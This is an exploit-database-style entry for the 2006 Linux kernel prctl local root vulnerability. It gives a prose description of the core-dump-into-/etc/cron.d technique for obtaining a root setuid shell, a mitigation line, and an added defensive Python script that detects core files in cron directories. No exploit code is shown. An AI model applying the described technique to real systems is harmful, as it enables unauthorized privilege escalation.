vendor: Linux Kernel
by: Sunix
CVSS: 7.2 HIGH
Local Privilege Escalation
CWE: 264
Product Name: Linux Kernel
Affected Version From: 2.6.13
Affected Version To: 2.6.17.4, 2.6.9-22.ELsmp
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Intel(R) Xeon(TM) CPU 3.20GHz
2006
PRCTL local root exp By: Sunix
This exploit targets a local privilege escalation vulnerability in the Linux kernel. It affects systems with kernel versions 2.6.13 to 2.6.17.4 and 2.6.9-22.ELsmp. The exploit uses the prctl() system call to set the process's dumpable flag to 2, which allows the attacker to create a core dump file of the process. The attacker then kills the process with a SIGSEGV signal, which causes the kernel to write a core dump file into the /etc/cron.d directory. The attacker then creates a cron job that executes a setuid shell in the /tmp directory, which gives the attacker root privileges.
Mitigation:
The best way to mitigate this vulnerability is to upgrade to a newer version of the Linux kernel.
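A detection check for the artifact described above, added here as an example and not part of the original entry or the exploit: it looks for ELF core dump files in a cron directory, since the description has the kernel writing the core dump into /etc/cron.d. The function names and the default directory list are assumptions made for this example.

```python
import os
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ET_CORE = 4  # e_type value for core files in the ELF specification
DEFAULT_DIRS = ["/etc/cron.d"]  # assumption: the directory named in the description

def is_elf_core(header: bytes) -> bool:
    """True if the bytes start an ELF header whose e_type is ET_CORE."""
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        return False
    # e_ident[EI_DATA] (byte 5): 1 = little-endian, 2 = big-endian
    if header[5] == 1:
        fmt = "<H"
    elif header[5] == 2:
        fmt = ">H"
    else:
        return False
    (e_type,) = struct.unpack_from(fmt, header, 16)  # e_type follows e_ident
    return e_type == ET_CORE

def find_core_dumps(directory: str) -> list:
    """Return (path, owner uid, size) for every ELF core file in directory."""
    findings = []
    try:
        entries = sorted(os.scandir(directory), key=lambda e: e.name)
    except OSError:
        return findings  # missing or unreadable directory: nothing to report
    for entry in entries:
        if not entry.is_file(follow_symlinks=False):
            continue
        try:
            with open(entry.path, "rb") as fh:
                header = fh.read(18)
        except OSError:
            continue
        if is_elf_core(header):
            st = entry.stat(follow_symlinks=False)
            findings.append((entry.path, st.st_uid, st.st_size))
    return findings

if __name__ == "__main__":
    hits = [h for d in (sys.argv[1:] or DEFAULT_DIRS) for h in find_core_dumps(d)]
    for path, uid, size in hits:
        print(f"core dump in cron directory: {path} uid={uid} size={size}")
    sys.exit(1 if hits else 0)
```

The script exits with status 1 when it finds a core file, so it can be run from a scheduled integrity check; pass other directories as arguments to scan them instead.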